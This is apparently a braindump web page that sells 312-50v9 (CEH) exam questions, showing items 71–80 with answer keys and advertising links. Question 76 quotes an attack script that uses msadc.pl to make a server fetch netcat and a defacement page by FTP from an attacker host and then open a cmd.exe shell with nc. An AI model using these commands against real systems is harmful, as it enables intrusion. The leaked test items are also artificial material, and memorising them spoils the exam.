[July-2017-New]312-50v9 Exam Dumps Free Download in Braindump2go[71-80]

2017 July New 312-50v9 Exam Dumps with PDF and VCE Free Updated in www.Braindump2go.com Today!

1.|2017 New 312-50v9 Exam Dumps (VCE & PDF) 589Q&As Download:
https://www.braindump2go.com/312-50v9.html

2.|2017 New 312-50v9 Exam Questions & Answers Download:
https://drive.google.com/drive/folders/0B75b5xYLjSSNWml5eng1ZVh6aHM?usp=sharing

QUESTION 71
A security engineer has been asked to deploy a secure remote access solution that will allow employees to connect to the company’s internal network. Which of the following can be implemented to minimize the opportunity for the man-in-the-middle attack to occur?

A.    SSL
B.    Mutual authentication
C.    IPSec
D.    Static IP addresses

Answer: C

QUESTION 72
A person approaches a network administrator and wants advice on how to send encrypted email from home. The end user does not want to have to pay for any license fees or manage server services. Which of the following is the most secure encryption protocol that the network administrator should recommend?

A.    IP Security (IPSEC)
B.    Multipurpose Internet Mail Extensions (MIME)
C.    Pretty Good Privacy (PGP)
D.    Hyper Text Transfer Protocol with Secure Socket Layer (HTTPS)

Answer: C

QUESTION 73
To send a PGP encrypted message, which piece of information from the recipient must the sender have before encrypting the message?

A.    Recipient’s private key
B.    Recipient’s public key
C.    Master encryption key
D.    Sender’s public key

Answer: B

QUESTION 74
An engineer is learning to write exploits in C++ and is using the exploit tool Backtrack. The engineer wants to compile the newest C++ exploit and name it calc.exe. Which command would the engineer use to accomplish this?

A.    g++ hackersExploit.cpp -o calc.exe
B.    g++ hackersExploit.py -o calc.exe
C.    g++ -i hackersExploit.pl -o calc.exe
D.    g++ –compile 璱 hackersExploit.cpp -o calc.exe

Answer: A

QUESTION 75
A recently hired network security associate at a local bank was given the responsibility to perform daily scans of the internal network to look for unauthorized devices. The employee decides to write a script that will scan the network for unauthorized devices every morning at 5:00 am.
Which of the following programming languages would most likely be used?

A.    PHP
B.    C#
C.    Python
D.    ASP.NET

Answer: C

QUESTION 76
A tester has been using the msadc.pl attack script to execute arbitrary commands on a Windows NT4 web server.
While it is effective, the tester finds it tedious to perform extended functions.
On further research, the tester come across a perl script that runs the following msadc functions:
system(“perl msadc.pl -h $host -C \”echo open $your >testfile\””);
system(“perl msadc.pl -h $host -C \”echo $user>>testfile\””);
system(“perl msadc.pl -h $host -C \”echo $pass>>testfile\””);
system(“perl msadc.pl -h $host -C \”echo bin>>testfile\””);
system(“perl msadc.pl -h $host -C \”echo get nc.exe>>testfile\””);
system(“perl msadc.pl -h $host -C \”echo get hacked.html>>testfile\””);
(“perl msadc.pl -h $host -C \”echo quit>>testfile\””);
system(“perl msadc.pl -h $host -C \”ftp \-s\:testfile\””);
$o=; print “Opening …\n”;
system(“perl msadc.pl -h $host -C \”nc -l -p $port -e cmd.exe\””);
Which exploit is indicated by this script?

A.    A buffer overflow exploit
B.    A chained exploit
C.    A SQL injection exploit
D.    A denial of service exploit

Answer: B
Explanation:

QUESTION 77
One advantage of an application-level firewall is the ability to

A.    filter packets at the network level.
B.    filter specific commands, such as http:post.
C.    retain state information for each packet.
D.    monitor tcp handshaking.

Answer: B

QUESTION 78
Which of the statements concerning proxy firewalls is correct?

A.    Proxy firewalls increase the speed and functionality of a network.
B.    Firewall proxy servers decentralize all activity for an application.
C.    Proxy firewalls block network packets from passing to and from a protected network.
D.    Computers establish a connection with a proxy firewall which initiates a new network connection for the client.

Answer: D

QUESTION 79
On a Linux device, which of the following commands will start the Nessus client in the background so that the Nessus server can be configured?

A.    nessus +
B.    nessus *s
C.    nessus &
D.    nessus -d

Answer: C

QUESTION 80
Which of the following tools will scan a network to perform vulnerability checks and compliance auditing?

A.    NMAP
B.    Metasploit
C.    Nessus
D.    BeEF

Answer: C


!!!RECOMMEND!!!

1.|2017 New 312-50v9 Exam Dumps (VCE & PDF) 589Q&As Download:
https://www.braindump2go.com/312-50v9.html

2.|2017 New 312-50v9 Study Guide Video:
https://youtu.be/U8B7_OOPx00

         

Braindump2go Testking Pass4sure Actualtests Others
$99.99 $124.99 $125.99 $189 $29.99/$49.99
Up-to-Dated
Real Questions
Error Correction
Printable PDF
Premium VCE
VCE Simulator
One Time Purchase
Instant Download
Unlimited Install
100% Pass Guarantee
100% Money Back